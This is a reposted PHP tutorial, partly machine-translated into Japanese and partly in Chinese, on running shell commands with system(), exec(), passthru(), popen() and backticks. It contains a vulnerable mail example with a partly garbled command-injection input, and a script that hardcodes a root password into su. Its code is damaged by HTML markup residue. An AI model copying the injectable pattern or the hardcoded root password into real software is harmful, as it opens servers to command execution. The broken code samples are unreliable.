[転送] PHP はシステム外部コマンドを実行します system() exec() passthru()、execpassthru_PHP チュートリアル

【転送】PHP はシステム外部コマンド system() exec() passthru(), execpassthru を実行します

私のメモ: これらを使用する場合はセキュリティの問題に注意する必要があります。関連する PHP コード監査をいくつかリストします。以下、転載内容です。

PHP は、サーバーサイドのスクリプト言語として、単純または複雑な動的 Web ページの作成などのタスクを完全に実行できます。ただし、常にそうとは限りません。場合によっては、特定の機能を実装するために、半分の労力で 2 倍の結果を得ることができるように、オペレーティング システムの外部プログラム (またはコマンド) に頼らなければなりません。

違い:
system() はシェル結果の最後の行を出力して返します。
exec() は結果を出力せず、シェル結果の最後の行を返します。すべての結果は返された配列に保存できます。
passthru()はコマンドを呼び出すだけで、コマンドの実行結果をそのまま標準出力装置に出力します。
同じこと: コマンド実行のステータスコードを取得できます
demo:

リーリー

PHP は、サーバーサイドのスクリプト言語として、単純または複雑な動的 Web ページの作成などのタスクを完全に実行できます。ただし、常にそうとは限りません。場合によっては、特定の機能を実装するために、半分の労力で 2 倍の結果を得ることができるように、オペレーティング システムの外部プログラム (またはコマンド) を使用する必要があります。
それでは、PHP スクリプトで外部コマンドを呼び出すことは可能でしょうか?もしそうなら、どうすればいいですか？どのような懸念がありますか?この記事を読めば、きっとこれらの疑問に答えられると思います。
それは可能ですか？
答えは「はい」です。 PHP は、他のプログラミング言語と同様に、プログラム内で外部コマンドを呼び出すことができます。呼び出しは非常に簡単です。1 つまたはいくつかの関数を使用するだけです。
前提条件
PHP は基本的に WEB プログラム開発に使用されるため、セキュリティは人々が考慮する重要な側面となっています。そこで、PHP 設計者は PHP への扉、つまりセーフ モードを追加しました。セーフ モードで実行する場合、PHP スクリプトには次の 4 つの制限が適用されます:
外部コマンドの実行
ファイルを開くときのいくつかの制限
MySQL データベースへの接続
HTTP ベースの認証
セーフ モードでは、特定のディレクトリのみ 外部プログラムのみのプログラムは実行できますが、他のプログラムへの呼び出しは拒否されます。このディレクトリは、php.ini ファイルのsafe_mode_exec_dir ディレクティブを使用するか、PHP のコンパイル時に --with-exec-dir オプションを追加することで指定できます。デフォルトは /usr/local/php/bin です。
結果 (PHP スクリプトにエラーがないことを意味します) を出力できるはずの外部コマンドを呼び出したにもかかわらず、空白が表示される場合は、ネットワーク管理者が PHP をセーフ モードで実行している可能性があります。
どうやってやるの？
PHP で外部コマンドを呼び出すには、次の 3 つの方法を使用できます:
1) PHP が提供する特別な関数を使用します
PHP は、外部コマンドを実行するために合計 3 つの特別な関数を提供します: system()、exec() 、passthru ()。
system()
プロトタイプ: string system (string command [, int return_var])
system() 関数は、指定されたコマンドを実行し、結果を出力して返します。 2 番目のパラメーターはオプションであり、コマンドの実行後にステータス コードを取得するために使用されます。
例:

リーリー

exec()
プロトタイプ: string exec (string command [, string array [, int return_var]])
exec () 関数は、指定されたコマンドを実行しますが、結果を出力しません。ただし、結果は最後の行を返します。コマンド結果の最後の行のみを返しますが、2 番目のパラメーター配列を使用すると、配列の末尾に結果を 1 行ずつ追加することで完全な結果を取得できます。したがって、配列が空でない場合は、呼び出す前に unset() を使用して配列をクリアするのが最善です。第3パラメータは第2パラメータを指定した場合のみ、コマンド実行時のステータスコードを取得できます。
例:

リーリー

passthru()
プロトタイプ: void passthru (string command [, int return_var])
passthru() はコマンドを呼び出すだけで結果は返さず、コマンドの実行結果をそのまま標準出力装置に直接出力します。したがって、 passthru() 関数は、pbmplus (元の画像のバイナリ ストリームを出力する、Unix で画像を処理するツール) のようなプログラムを呼び出すためによく使用されます。コマンド実行時のステータスコードも取得できます。
例:

<?<span>php 
header(</span><span>"</span><span>Content-type: image/gif</span><span>"</span><span>); 
passthru(</span><span>"</span><span>./ppmtogif hunte.ppm</span><span>"</span><span>); 
</span>?> 

2） 用popen()函数打开进程 
上面的方法只能简单地执行命令，却不能与命令交互。但有些时候必须向命令输入一些东西，如在增加Linux的系统用户时，要调用su来把当前用户换到root才行，而su命令必须要在命令行上输入root的密码。这种情况下，用上面提到的方法显然是不行的。 
popen ()函数打开一个进程管道来执行给定的命令，返回一个文件句柄。既然返回的是一个文件句柄，那么就可以对它读和写了。在PHP3中，对这种句柄只能做单一 的操作模式，要么写，要么读；从PHP4开始，可以同时读和写了。除非这个句柄是以一种模式（读或写）打开的，否则必须调用pclose()函数来关闭 它。 
例子1：

<?<span>php 
$fp</span>=popen(<span>"</span><span>/bin/ls -l</span><span>"</span>, <span>"</span><span>r</span><span>"</span><span>); 
</span>?> 

例子2：

<?<span>php 
</span><span>/*</span><span> PHP中如何增加一个系统用户 
下面是一段例程，增加一个名字为james的用户, 
root密码是 verygood。仅供参考 
</span><span>*/</span><span> 
$sucommand </span>= <span>"</span><span>su --login root --command</span><span>"</span><span>; 
$useradd </span>= <span>"</span><span>useradd </span><span>"</span><span>; 
$rootpasswd </span>= <span>"</span><span>verygood</span><span>"</span><span>; 
$user </span>= <span>"</span><span>james</span><span>"</span><span>; 
$user_add </span>= sprintf(<span>"</span><span>%s </span><span>"</span>%s %s<span>""</span><span>,$sucommand,$useradd,$user); 
$fp </span>= @popen($user_add,<span>"</span><span>w</span><span>"</span><span>); 
@fputs($fp,$rootpasswd); 
@pclose($fp); 
</span>?> 

3） 用反撇号（`，也就是键盘上ESC键下面的那个，和~在同一个上面） 
这个方法以前没有归入PHP的文档，是作为一个秘技存在的。方法很简单，用两个反撇号把要执行的命令括起来作为一个表达式，这个表达式的值就是命令执行的结果。如：

<?<span>php 
$res</span>=<span>'</span><span>/bin/ls -l</span><span>'</span><span>; 
echo </span><span>'</span> <span>
'</span><span>.$res.</span><span>'</span> 
<span>'</span><span>; </span>
?> 

这个脚本的输出就象： 
hunte.gif 
hunte.ppm 
jpg.htm 
jpg.jpg 
passthru.php 

要考虑些什么？ 
要考虑两个问题：安全性和超时。 
先 看安全性。比如，你有一家小型的网上商店，所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件，让你的用户输入他们的EMAIL地 址，然后把这个产品列表发给他们。假设你没有使用PHP的mail()函数（或者从未听说过），你就调用Linux/Unix系统的mail程序来发送这 个文件。程序就象这样： 

 

<?<span>php 
system(</span><span>"</span><span>mail $to < products.txt</span><span>"</span><span>); 
echo </span><span>"</span><span>我们的产品目录已经发送到你的信箱：$to</span><span>"</span><span>; 
</span>?> 

用这段代码，一般的用户不会产生什么危险，但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址： 
'--bla ; mail someone@domain.com 566bc23827dab15b90b02955087b4e12）和从文件读入 （<）等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号，并把字符串中的单引号转义，这样这个字符串 就可以安全地作为命令的参数。 

再来看看超时问题。如果要执行的命令要花费很长的时间，那么应该把这个命令放到系统的后台去运 行。但在默认情况下，象system()等函数要等到这个命令运行完才返回（实际上是要等命令的输出结果），这肯定会引起PHP脚本的超时。解决的办法是 把命令的输出重定向到另外一个文件或流中，如：

<?<span>php 
system(</span><span>"</span><span>/usr/local/bin/order_proc > /tmp/null &</span><span>"</span><span>); 
</span>?> 

 

http://www.bkjia.com/PHPjc/1090451.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/1090451.htmlTechArticle【转】PHP 执行系统外部命令 system() exec() passthru()，execpassthru 本人注：使用必须注意安全性问题，在后面我会列举一些相关的php代码审计。...